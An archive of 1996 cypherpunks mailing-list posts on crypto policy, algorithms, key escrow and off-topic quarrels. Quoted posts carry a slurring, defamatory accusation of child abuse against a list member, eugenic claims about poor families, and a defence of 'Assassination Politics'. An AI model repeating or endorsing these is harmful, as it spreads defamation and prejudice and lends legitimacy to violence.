MIME-Version: 1.0
Content-Type: text/plain




WANTED: CRYPTOGRAPHERS AND SECURITY EXPERTS
-------------------------------------------

I am consulting at a technology company which
is supplying electronic commerce solutions.

We need security experts, hackers/crackers, & programmers, to
help in performing blackbox and clearbox penetration testing
of the systems/server and the front-end client/product.

We also seek collaborators who can help us with security
policy review and programmers who can help us implement
our visions.

Interested parties please contact me via email
or at 415 380 8100.

Thanks,

--C;




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 25 Sep 1996 15:49:19 +0800
To: Lucky Green <rpandya@netcom.com>
Subject: Re: Private Information Retrieval
Message-ID: <199609250458.VAA20863@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  8:54 PM 9/24/96 -0700, Lucky Green wrote:
>On Tue, 24 Sep 1996, Ravi Pandya wrote:
>
>> ABSTRACT:
>> 
>> Publicly accessible databases are an indispensable resource for retrieving  
>> up to date information. But they also pose a significant risk to the 
>> privacy of the user, since a curious database operator can follow the user's 
>> queries and infer what the user  is after.
>
>Hmm. Sounds like job for KeyKOS :-)


Yup.  That was the original problem KeyKOS nee Gnosis was designed to solve.


-------------------------------------------------------------------------
Bill Frantz       | "Cave softly, cave safely, | Periwinkle -- Consulting
(408)356-8506     | and cave with duct tape."  | 16345 Englewood Ave.
frantz@netcom.com |           - Marianne Russo | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 25 Sep 1996 16:14:31 +0800
To: cypherpunks@toad.com
Subject: Re: provably hard PK cryptosystems
Message-ID: <199609250509.WAA20265@dfw-ix12.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:26 PM 9/24/96 +0200, Gary Howland <gary@systemics.com> wrote:
>I fail to see *any* (non educational) use for these DNA "computers", let
>alone a cryptographic use - sure, they may be massively parallel, but
>what's the big deal?  I can now perform a calculation a million times
>faster than I could yesterday? (something I personally doubt, but will
>agree to for sake of the argument). 

One mole of a substance contains ~6x10**23 molecules,
and weighs one gram per atomic-weight of the molecule.
A DNA "computer" might weigh a kilo or two for one mole
of computer virus.  It may not be blazingly fast, especially
if you've got to synthesize lots of different molecules
to make it up, plus extract the result from the data soup,
but 10**23 is a _big_ number.  It's probably not very useful
for cryptographic applications, but Adleman was using it to
solve Travelling Salesman problems, which are NP-hard,
and if you do have a crypto problem that maps well into TSP,
a hot-tub full of interesting solutions might be an interesting solution,
especially if you've got a huge underground lab and a 
National Institutes of Health nearby in case you have any bugs
or memory leaks in your program.....

Unlike quantum computing, it doesn't change the exponentiality
of the problems it's solving, it just multiplies the computing
capability by a very big constant, and it does parallelize cleanly.
The engineering is tricky, but I find it more believable than
practical high-precision quantum computers.

And if the DNA computer doesn't work, you can always recycle
your lab to synthesize large quantities of recreational pharamceuticals
and use the money from them to bribe the person who knows the key.

                                Avogadro


#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Wed, 25 Sep 1996 16:42:47 +0800
To: "tcmay@got.net>
Subject: Re: Public Schools
Message-ID: <19960925051617328.AAA184@IO-ONLINE.COM>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 22 Sep 1996 15:40:32 -0700, Timothy C. May wrote:

>>> thru about the 3rd or 4th grade, and I do agree that most of todays schools
>>> are shit, however there is one area--social skills--that homeschooling
>>> simply can't compete. Children need to learn how to interact with one another

>>in a certain area get together.  Homeschooling does not have to stand in
>>the way of a normal socialization process.

>Also--and I mean this point completely seriously!--many parents are not
>altogether convinced that the "public school socialization" is all that
>beneficial. Do kids really _need_ to learn to wear gang colors, smoke to be
>cool, get pregnant at age 14, and so on?

>I think the "social skills" Snow talks about above are actually the _worst_
>part of public schools in fin-de-Siecle America. If I had a kid, I wouldn't
>want him or her in the local public schools.

I'd have to disagree with you on this.   Based on my experience in 3 widely
different districts, such behaviour/problems isn't likely to result from the
school environment.  It's a function of the family life these kids have.   If
they come from a disfunctional family, kids are going to join gangs, get 
pregnant , use drugs, etc no matter what school they're at.   If they have
the right background, it's not going to happen.  

Of course, in some areas (esp. inner cities) the rate of social dysfunction
is extremely high, so some schools are 90% 'problem-kids' as well.   I'd
reccommend against having a homeschooled kid go to one of those (unless
you've been using the Cypherpunks Homeschool Plan For the Instruction of the
3 Rs,  Martial Arts, Bomb-Making, Assasination and Black-Helicopter
Countermeasures.  I imagine school would be very popular if some list members
were teaching)  just because it would significantly reduce the opportunity
for them to catch a stray bullet or something.   I still doubt that a
homeschooled kid from a strong family would join these groups.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Wed, 25 Sep 1996 15:51:40 +0800
To: "dustman@athensnet.com>
Subject: Re: A daily word of caution in reference Tim C[unt] May
Message-ID: <19960925052046390.AAA216@IO-ONLINE.COM>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 23 Sep 1996 01:50:01 -0400, Dustbin Freedom Remailer wrote:

>Tim C[unt] May is not only as queer as a three dollar bill, but he is also into 
>having sex with children.

Hi Dmitri!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Wed, 25 Sep 1996 18:44:09 +0800
To: "Eric Murray" <carboy@hooked.net>
Subject: Re: Snooping ISP admin??
Message-ID: <19960925052720218.AAA216@IO-ONLINE.COM>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 23 Sep 1996 08:30:34 -0700 (PDT), Eric Murray wrote:

>> encountered "POP3 account in use by another user" several times in the
>> past few days and I am the only user... wondering if that "in use"
>> messsage is the result of a clumsy sysadmin being caught with his hand
>> in the cookie jar. 
>> Any thoughts from the group??? 
>
>If the sysadmin is reading your PGP mail, let him.  It's very very
>unlikely that he has the resources available to crack a PGP
>message in this century.

And if he does, his machine should be fast enough to read the entire mailbox
before Michael could notice... <g>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Wed, 25 Sep 1996 16:16:43 +0800
To: "eric@sac.net>
Subject: Re: List participation
Message-ID: <19960925053157109.AAA213@IO-ONLINE.COM>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 23 Sep 1996 10:25:09 -0700, Eric Hughes wrote:

>I have been informed that Dr.Dimitri Vulis KOTM <dlv@bwalk.dm.com> wrote:
>> [...] Tim's off-topic spews have driven Eric Hughes, John Gilmore,
>> Rich Salz, and many other former valuable contributors off the
>> mailing list [...]
>
>As for me, I stopped having time to read cypherpunks a year and a half ago.
>Tim had nothing to do with it.  The cypherpunks list has changed and I have
>changed; so be it.

What do you think the odds are the good Dr. is going to say this is a forgery
 by tcmay?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan Harmon <harmon@tenet.edu>
Date: Wed, 25 Sep 1996 14:00:00 +0800
To: "William H. Geiger III" <whgiii@amaranth.com>
Subject: Re: Public Schools
In-Reply-To: <199609241652.LAA22261@mailhub.amaranth.com>
Message-ID: <Pine.OSF.3.91.960924222425.29544A-100000@alpha.tenet.edu>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 24 Sep 1996, William H. Geiger III wrote:

>    Dan Harmon <harmon@tenet.edu> said:

> >One of the hardest things that we have to work hardest to counter-act 
> >with our twins, who attend PS, is the socialization they 
> >pick up at school.
> 
> There is an easy solution to that problem, it's called home school. :)
> 

We know several people that home school and it takes a very special 
people to do it. In our case, it may turn out to be the only option.
The twins are ADHD with possible Tourettes and/or OCD. They we diagnosed at 
four, before it became the rage, and are now ten, going on six emotionally.

We keep trying and working with them.

Dan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: geeman <geeman@best.com>
Date: Wed, 25 Sep 1996 16:02:26 +0800
To: Scott Guthery <guthery@snailbox.com>
Subject: Re: Tamper-Resistant Software from INTEL
In-Reply-To: <199609242330.SAA16789@oak.zilker.net>
Message-ID: <3248C68E.F61@best.com>
MIME-Version: 1.0
Content-Type: text/plain


Scott Guthery wrote:
> 
> Has anybody heard of tamper-resistant software in general or a method
> for tamper-resistant software from Intel in particular?
> 


yes.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Wed, 25 Sep 1996 16:01:48 +0800
To: "Adam Shostack" <haggis@brutus.bright.net>
Subject: Re: Taking crypto out of the U.S.
Message-ID: <19960925054434656.AAA117@IO-ONLINE.COM>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 23 Sep 1996 21:25:33 -0500 (EST), Adam Shostack wrote:

>Theres a personal use exemption.  Michael Froomkin's web page has a
>pointer to it.

What if your laptop gets "stolen"?  Or you sell it for a plane ticket home
after your wallet gets pinched?


>|         Soon I am going to be going overseas to Japan, and I want to take
>| my notebook with me so I can keep up with everything, however, I have
>| encrypted my hard drive and usually encrypt my mail.  Is this in violation
>| of the ITAR to keep everything the same when I go over?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@tivoli.com>
Date: Wed, 25 Sep 1996 14:03:25 +0800
To: camcc@abraxis.com
Subject: Re: [EFG] Fwd: Ga. Internet Law Challenged
In-Reply-To: <2.2.32.19960925010103.00679840@smtp1.abraxis.com>
Message-ID: <3248AAFE.5F7@tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


> >>   ``If 50 states pass 50 contradictory laws, Internet users will
> >>be virtually paralyzed for fear of violating one or more of those
> >>laws,'' she said.

Actually, I imagine Internet users will simply snigger and go on with
their idiotic "me too"s to USENET, their sophomoric nudie websites,
and their spams.

(I love the Internet.)

______c_________________________________________________________________
Mike M Nally * IBM % Tivoli * Austin TX  * How quickly we forget that
mailto:m5@tivoli.com mailto:m101@io.com  * "deer processing" and "data
http://www.io.com/~m101/                 * processing" are different!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Wed, 25 Sep 1996 16:34:25 +0800
To: cypherpunks@toad.com
Subject: Clipper 3 spec release imminent
Message-ID: <3.0b19.32.19960924225206.006eb8e0@ricochet.net>
MIME-Version: 1.0
Content-Type: text/plain



According to a story posted to C|net tonight, the Clinton administration
will likely release the third Clipper/GAK proposal soon. The article
(available at http://www.news.com/News/Item/0,4,3791,00.html ) indicates:

"What the proposal specifies is still a matter of speculation, but an 
article today in the Daily Report for Executives quotes unnamed U.S.
officials saying the plan will raise the ceiling on encryption export
controls, institute a key-escrow system, and give the Commerce Department
authority to grant export licenses. 

If the report is correct, the two big surprises are a new 56-bit limit key
length, with export of anything higher subject to key escrow, and the
authorizing of the Justice Department--most likely the Federal Bureau of
Investigation--to reject any applications for export licenses."

There's a sidebar to the story with several other crypto-related stories,
mentioning ProCODE and last Friday's hearing in the Bernstein case.
--
Greg Broiles                |  "We pretend to be their friends,
gbroiles@netbox.com         |   but they fuck with our heads."
http://www.io.com/~gbroiles |
                            |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Wed, 25 Sep 1996 17:09:43 +0800
To: "Dale Thorn" <haggis@brutus.bright.net>
Subject: Re: Taking crypto out of the U.S.
Message-ID: <19960925060114140.AAA186@IO-ONLINE.COM>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 24 Sep 1996 07:01:51 -0700, Dale Thorn wrote:


>> Soon I am going to be going overseas to Japan, and I want to take
>> my notebook with me so I can keep up with everything, however, I have
>> encrypted my hard drive and usually encrypt my mail.  Is this in
>> violation of the ITAR to keep everything the same when I go over?

>Bad enough now that many places require you to put your laptop computer 
>through the big gray x-ray machine (no exceptions in some places, 
>especially federal buildings in the U.S.), but if they start requiring 
>you to list individual files (?????).

Very high potential for abuse here! <g> 

 Under HPFS (OS/2's file system) each file takes a minimum of 512 bytes.   On
your average $200 2GB drive, that'd be around 4194304 files.  I wonder if
they have that much printer paper? (Particularly to handle those fully
qualified filenames...) <g>  Now, if you were some sort of
evil-cypherpunk-hacker, you might have a hacked copy of Linux that has some
really "creative" file systems (The fractal file system - 5 trillion files
and counting) and puts that to shame.   Even better, have something
equivelent to a source-code shrouder that would go through and create a bunch
of random looking file names (Was PGP 0e3ahjw2.exe or 052a6v62.obj?)


In other words, I have a feeling this would fly about as far as a V-22.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Wed, 25 Sep 1996 10:05:43 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: SAY WHAT? [Hallam-Baker demands more repudiations or he'll write!]
In-Reply-To: <Pine.SUN.3.91.960924143919.28504B-100000@tipper.oit.unc.edu>
Message-ID: <199609242306.RAA23971@InfoWest.COM>
MIME-Version: 1.0
Content-Type: text/plain


In <Pine.SUN.3.91.960924143919.28504B-100000@tipper.oit.unc.edu>, on
09/24/96 
   at 03:19 PM, Simon Spero <ses@tipper.oit.unc.edu> said:

= .On Tue, 24 Sep 1996, attila wrote:

= .> 
= .>         go back to your beloved England and your labour unions
= .			your roots are showing :-) ----^

        REALLY?

= .>         NO, I will not outright reject Jim Bell's "Assassination
= .> Politics."

= .Assasination politics is  impossible to defend from a classical 
= .Liberal/Libertarian position. Bell advocates arbitrary applications
= .of  violence and coercion without restriction. There is no way to
= .justify the  initiation of force without abandoning any pretence of
= .being a  Libertarian (which, to be fair, Bell doesn't claim to be).

        all very true.  but I will defend Jim Bell's rights to propose
    them, even if Bell is more than a few cards short of a full deck.


--
  Politicians are like diapers.
    They both need changing regularly, and for the same reason.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 25 Sep 1996 16:27:35 +0800
To: cypherpunks@toad.com
Subject: Re: Bork book
Message-ID: <199609250609.XAA23128@dfw-ix12.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:28 AM 9/24/96 -0400, "Marc J. Wohler" <mwohler@ix.netcom.com> wrote:
>Heard him on Limbaugh pushing hard for censorship as a cure for society's
>problems.  Looks like Ted Kennedy & Co. were right to keep him off the court.

Bork's comment a few years ago about the Ninth Amendment being an 
ink-blot on the Constitution was one of those Rorschach things you
can interpret either way, but given that he clearly doesn't believe
in the First Amendment, I'd guess he wouldn't have helped the 9th 
or the other rights-protecting amendments either.

I didn't catch Bork directly, but I heard Limbaugh talking about it the
day before and about half an hour after, so I caught some flavor of it.

It was interesting hearing Limbaugh's mixed feelings about it;
he seems to clearly _approve_ of censoring people that offend him,
like 2 Live Crew, but also realizes that people would want to censor _him_.
I'm guessing that the schtick he did on Pee-Wee Herman (with background
music by Michael Jackson) a few minutes before saying he'd be interviewing
Bork on Friday was coincidence, rather than something he'd done to set
the tone of a discussion of censorship, but maybe not.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 25 Sep 1996 16:21:58 +0800
To: "William H. Geiger III" <whgiii@amaranth.com>
Subject: Re: WARNING: This Message Actually Contains a Question Reguarding Crypto!
Message-ID: <199609250610.XAA23137@dfw-ix12.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:34 AM 9/24/96 -0500, "William H. Geiger III" <whgiii@amaranth.com> wrote:
>I just recently downloaded copies of Blowfish & Ghost.
Do you mean GOST, the Russian algorithm family?

>Does anyone have any experiance with these two algorithims?

>How do they comare to RSA, DES, 3DES, IDEA ?

Bruce Schneier's book Applied Cryptography discusses
Blowfish (no surprise, since it's his algorithm) and
I think also discusses GOST.  Blowfish is very fast
once you've finished the (deliberately slow) key schedule.
It appears to be tolerably strong, though there hasn't
been as much analysis on it as on RC4 or IDEA yet, much less DES.

GOST requires you to set some parameters, I think S-boxes,
and the strength of the algorithm depends on lots of subtle
effects of those parameters.  The set used by the Russian military
is classified; some of the other sets are public, and
presumably the implementation you have gets its values from someone.
Unless you know who, and how strong they are, I wouldn't trust it.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@amaranth.com>
Date: Wed, 25 Sep 1996 14:33:37 +0800
To: cypherpunks@toad.com
Subject: ISP Legal Fund
Message-ID: <199609250430.XAA29666@mailhub.amaranth.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi,

As it seems to be an almost daily event of hearing of a government authortity
infringing on the liberty of Internet Users throughout the world I would like to
present the following proposal:

The establishment of an Internet Service Provider Legal Fund.

All ISP world-wide would contribute to this fund. The resources of this fund would be
used for the legal fees of ISP who whish to challenge government infringements of
their users freedoms & liberties. Something like an ACLU for the Internet but on a
Global scale.

Any thoughts?

--
-----------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    WebExplorer & Java Enhanced!!!
Merlin Beta Test Site - WarpServer SMP Test Site

Author of PGPMR2 - PGP Front End for MR/2 Ice

Look for MR/2 Tips & Rexx Scripts
Get Work Place Shell for Windows!!
PGP & MR/2 the only way for secure e-mail.
                            
Finger whgiii@amaranth.com for PGP Key and other info
-----------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: geeman <geeman@best.com>
Date: Wed, 25 Sep 1996 18:00:04 +0800
To: cypherpunks@toad.com
Subject: [Fwd: Int'l Crypto Resolution Released in Paris]
Message-ID: <3248CF35.6A54@best.com>
MIME-Version: 1.0
Content-Type: message/rfc822


Subject: Int'l Crypto Resolution Released in Paris
From: epic-news@epic.org (EPIC-News)
Date: 25 Sep 1996 02:23:09 GMT
Distribution: inet
Newsgroups: talk.politics.crypto,alt.privacy,alt.privacy.clipper,comp.org.eff.talk,comp.org.cpsr.talk,alt.security.pgp,alt.politics.datahighway
Organization: Electronic Privacy Information Center
Xref: nntp1.best.com talk.politics.crypto:11623 alt.privacy:21788 alt.privacy.clipper:2081 comp.org.eff.talk:49854 comp.org.cpsr.talk:9421 alt.security.pgp:44146 alt.politics.datahighway:17830


               ----------------------------------------------

          RESOLUTION IN SUPPORT OF THE FREEDOM TO USE CRYPTOGRAPHY

                           -----------------------

                              25 SEPTEMBER 1996
                                PARIS, FRANCE

                           -----------------------

WHEREAS the Organization for Economic Cooperation and Development (OECD) is
now considering the development of an international policy for the use of
cryptography;

WHEREAS the use of cryptography implicates human rights and matters of
personal liberty that affect individuals around the world;

WHEREAS national governments have already taken steps to detain and to
harass users and developers of cryptography technology;

WHEREAS cryptography is already in use by human rights advocates who face
persecution by their national governments;

WHEREAS the privacy of communication is explicitly protected by Article 12
of the Universal Declaration of Human Rights, Article 17 of the
International Covenant on Civil and Political Rights, and national law;

WHEREAS cryptography will play an increasingly important role in the ability
of citizens to protect their privacy in the Information Society;

RECOGNIZING that the OECD has made many substantial contributions to the
preservation of human rights and the protection of privacy in particular;

FURTHER RECOGNIZING that decisions about cryptography policy may gives rise
to communication networks that favor privacy or favor surveillance;

FURTHER RECOGNIZING that the promotion of key escrow encryption by
government poses a direct threat to the privacy rights of citizens;

THE FOLLOWING NATIONAL AND INTERNATIONAL ORGANIZATIONS, concerned with
matters of human rights, civil liberty, and personal freedom, have joined
together to

     URGE the OECD to base its cryptography policies on the fundamental
     right of citizens to engage in private communication;

     FURTHER URGE the OECD to resist policies that would encourage the
     development of communication networks designed for surveillance;
     and

     RECOMMEND that the OECD turn its attention to growing public
     concerns about the widespread use of surveillance technologies and
     the implications for Democratic Society and Personal Liberty
     around the world.

                           -----------------------

RESPECTFULLY ENDORSED,

   * ALCEI (Electronic Frontiers Italy)

   * American Civil Liberties Union

   * Association des Utilisateurs d'Internet

   * CITADEL-EF France

   * Computer Professionals for Social Responsibility

   * cyberPOLIS

   * Digital Citizens Foundation in the Netherlands

   * EFF-Austin

   * Electronic Frontier Australia

   * Electronic Frontier Canada

   * Electronic Privacy Information Center

   * NetAction

   * Privacy International

                           -----------------------

----------------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Gairson <erp@digiforest.com>
Date: Wed, 25 Sep 1996 17:09:24 +0800
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: Public Schools
In-Reply-To: <20uRuD1w165w@bwalk.dm.com>
Message-ID: <Pine.LNX.3.91.960924232410.387A-100000@digital.digiforest.com>
MIME-Version: 1.0
Content-Type: text/plain


First off, what does this have to do with cryptography?  or anything 
cypher for that matter?

On Tue, 24 Sep 1996, Dr.Dimitri Vulis KOTM wrote:

> Phil Fraering <pgf@acadian.net> writes:
> 
> > On Mon, 23 Sep 1996, Dr.Dimitri Vulis KOTM wrote:
> > 
> > > 
> > > U.S. public school system is darwinian evolution in action. Parents who can
> > > afford to send their kids to private schools, do so. Parents who send their
> > > kids to public schools deserve to have their offsprings fucked up, mentally
> > > and phsyically, to improve the species' gene pool.

So, basically your saying, since my parents cannot afford to pay for a 
private school for me, we are genetically inferior to those who can?
Because hate tell ya, but I've ran into some major idiots that go to 
private schools.  Also to consider that from the school I go to, last 
year we had two perfect sat scores (no problems missed).

> > 
> > But the cutoff is often whether the parents can afford to send their kids
> > to private school, not whether or not they're genetically superior.
> 
> You must have attended a public school if you don't understand that geentic
> superiority leads to economic success.  My older kid goes to a private school.
> The parents are obviously genetically superior to public school parents.

I am assuming from what you have said in that statement, that you believe 
since he may have gone to a public school, it has made him have the 
opinion he does?
Also, in your statement that your older kid goes to a private school, and 
that the parents are obviously genetically superior to public school 
parents.  You seem to be saying that YOU are genetically superior to my 
parents?
Another thing to consider here is, from this line of statements, you are 
saying that children who have parents who made it well in, let us say the 
movie buisness (or even drug buisness), and then send there children to 
public schools, are genetically superior because they can act (lie) 
better than my parents.  For if this is so, that must mean that my aunt 
is genetically superior to my mother (who is a teacher at a private 
school, but she did not go to a private school) and to her parents, for 
she is making more money, and if she ever has children they will be 
genetically superior to me, because they will have more money?
Just wanting this cleared up please..  It kind of confuses poor little 
'ol me who is jsut a lousy senior in a public school (and scored 1560 on 
my SAT, as if that means anything, just means I have a good memory), 
since from what you say I must be stupid, because my parents only make 
50 to 60k$ per year between the two of them (My father being an AutoCad 
Design Consultant, and my Mother a LD (Learning disabled) Teacher at a 
public school)?

> 
> > And the reason it costs so much to send a kid to private school is that
> > everyone's already paying for a more expensive public school thanks to all
> > the taxes.

True, but also depends on where you are at.  Some states have cheaper 
taxes (Nevada for instance), compared to others.

> 
> Push vouchers. What's the cryptorelevance of your comments, anyway?
> 

Umm, where you not the one that started this conversation?

> > > There are plenty of excellent private elementary and secondary schools in t
> > > U.S. Children who deserve better schooling (by virtue of having parents who
> > > have better genes and are therefore economically successful) get it.
> > 
> > So if I'm economically successful it'll change my genes?
> > 
> > I guess this is the famous Russian belief in Lamarkianism in action.

>From the sounds of what he said, Lamark was 100 Percent correct, and 
Darwin and (that other guy, name just slipped my mind, must be those 
genetically inferior genes of mine)?

> No, on the contrary, sending poor kids to good schools on scholarships
> does not improve their genes. They tend to become drug dealers.

Hate to inform you on this but, it is more often than not the children 
sent by there rich mama and papa to school, that end up on drugs or as 
drug dealers, than the ones that start out with scholarships (For the 
ones with scholarships have more to loose, than the ones with the rich 
mama and papa, for the rich mama and papa can afford the big expensive 
lawyer.).  Just look at the studies and such done on this type of area.  
Also you have to consider that generally the ones that end up as drug 
dealers, are the children who have parents that where drug dealers and 
such or had experience in such, or just had parents who didn't care what 
they did.



Ok, now back to something crypto related ok?  Though I am rather 
interested in this subject.


Boy oh boy, someone has a opssibly inferiority complex here...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Wed, 25 Sep 1996 14:51:57 +0800
To: rburr@sprynet.com
Subject: Re: Hallam-Baker demands more repudiations or he'll write!
In-Reply-To: <3.0b24.32.19960924064658.006b3540@mail.teleport.com>
Message-ID: <Pine.BSF.3.91.960924234700.18469S-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 24 Sep 1996, Rich Burroughs wrote:

> <AP stuff>
> Anyone who mistakes the lack of "repudiations" for AP on the list for some
> kind of tacit approval is not getting the whole picture, IMHO.  
> 
> Is this how journalists do their research nowadays -- "give me some info or
> I'll write something really bad about you that you'll regret?"  Cool.  I
> guess I thought there might still be some kind of pursuit of the truth
> involved.
> 
> I personally don't have the time or energy to contribute to the AP threads.
> That != approval for the idea.
> 
> I hope you include your above quote in your piece.
> 

Amen to that.  Add that at least one lawyer (and former prosecutor) on 
the list is confident that successful prosecutions will ensue is AP ever 
gets off the ground.  And yes, I've read Jim Bell's manifesto.  The fact 
that no lawyer has dissected it from a legal standpoint has been used by 
Mr. Bell as support for the propostion that it is legal.  As many 
professional crytographers/computer security experts/etc. on the list 
rightly say when free work is demanded of them:  pay me my rate and I'll 
do the analysis.

EBD 



> 
> Rich
> 
> 
> ______________________________________________________________________
> Rich Burroughs  richieb@teleport.com  http://www.teleport.com/~richieb
> See my Blue Ribbon Page at http://www.teleport.com/~richieb/blueribbon
> U.S. State Censorship Page at - http://www.teleport.com/~richieb/state
> New EF zine "cause for alarm" - http://www.teleport.com/~richieb/cause
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Wed, 25 Sep 1996 18:13:08 +0800
To: perry@piermont.com
Subject: Re: The Nature of the Cypherpunks List
In-Reply-To: <199609241913.PAA19989@jekyll.piermont.com>
Message-ID: <3248D7E9.C0A@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Re: below whimpering/whining/sniveling.
Why don't you guys learn to use your computers?
People who write this stuff must be thinking something like:
"Gee, that cypherpunks list has SO much good info on it, I can't stand 
to not keep track of what's going on there.  But those occasional 
irritating posts just upset me so much, I can't deal with it, so I 
better get it off of my chest and tell everyone.  Oh, I feel so much 
better now, maybe they'll let me go home today."

Perry E. Metzger wrote:
> Timothy C. May writes:
> > While some folks would rather we talked only about "crypto," just
> > how many times can basic questions about Diffie-Hellman, or RSA, or 
> > elliptic curves be discussed?

> I think a better question is "do we need to have to make sure people
> are posting for the sake of posting? Why must we have a charter broad
> enough to generate too much volume to allow conversation?"
> Sure, there is a limit to what can be said about cryptography and the
> direct politics of cryptography. *THAT IS THE POINT*. That is why I'm
> starting a new list -- so that I can abandon this waste heap to those
> that like frolicking in the mire.

> > And as I was there at the initial planning meeting in July of '92,
> > and then at the first physical meeting, I can assure you that what
> > soon became "Cypherpunks" was never intended to be an announcement
> > list for research discoveries in mathematical cryptography!

> No. It was intended for discussion of cryptography *and* the politics
> of cryptography. Not theories about some airliner was shot down by
> aliens, not random musings on "assasination politics". The idea was
> never to be restricted just to the technical aspects of cryptography,
> but the notion was to have a place where the non-technical discussion
> also was on *cryptography*. This list no longer has *any* charter. A
> posting on sexual practices in Botswana is probably as "on topic" as
> anything else these days.
> The new list, however, will have a charter, and it *will* be enforced.

> > Much as some have been shrilly claiming "This list is for crypto and
> > programming discussions only," this was *never* the intent.

> Tim, I hate to say this, but cypherpunks is a sewer which has driven
> off anyone seriously interested in the area, and you are part of the
> reason.

> > The serious crypto researchers, e.g., the Matt Blazes, the Whit
> > Diffies, and the Carl Ellisons of the world, have various channels
> > they use to communicate in.

> For those who can think back a few years, this *used* to be one of
> those fora. No longer, of course. This is not for people serious about
> anything. I no longer read 99% of what is posted here -- its drek.
> I do not believe it would be good, however, for the list to be shut
> down, because there have to be sewers to carry the world's
> intellectual waste products, and if this list did not exist the likes
> of Jim Bell and the others would be out causing harm on other mailing
> lists.
> PS Still looking for a solid site that can host a 1500 member
> significant volume mailing list without choking.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Wed, 25 Sep 1996 17:48:13 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: SAY WHAT? [Hallam-Baker demands more repudiations or he'll write!]
In-Reply-To: <Pine.SUN.3.91.960924143919.28504B-100000@tipper.oit.unc.edu>
Message-ID: <3248DE04.5363@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Simon Spero wrote:
> On Tue, 24 Sep 1996, attila wrote:
> > NO, I will not outright reject Jim Bell's "Assassination Politics."

> Assasination politics is  impossible to defend from a classical
> Liberal/Libertarian position. Bell advocates arbitrary applications of
> violence and coercion without restriction. There is no way to justify 
> the initiation of force without abandoning any pretence of being a
> Libertarian (which, to be fair, Bell doesn't claim to be).

I understood the intent of AP was to take powers the government is 
already exercising (unconstitutionally), and merely transfer some of 
them to the people, as it were.

Isn't this true democracy (if a rather perverse kind)?

Maybe you should consider that, in the final analysis, Mr. Bell may not 
so much want all of us to have responsibility for killing as he does 
want to remove the govt's "arbitrary applications of violence and 
coercion without restriction", and AP is just your wake-up call.

Maybe, instead of having to face the (alleged) horror of AP, you could 
join with other like-minded citizens and stop these atrocities from the 
top down, if you have the nerve to go toe-to-toe with "the real 
killers", government-style.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
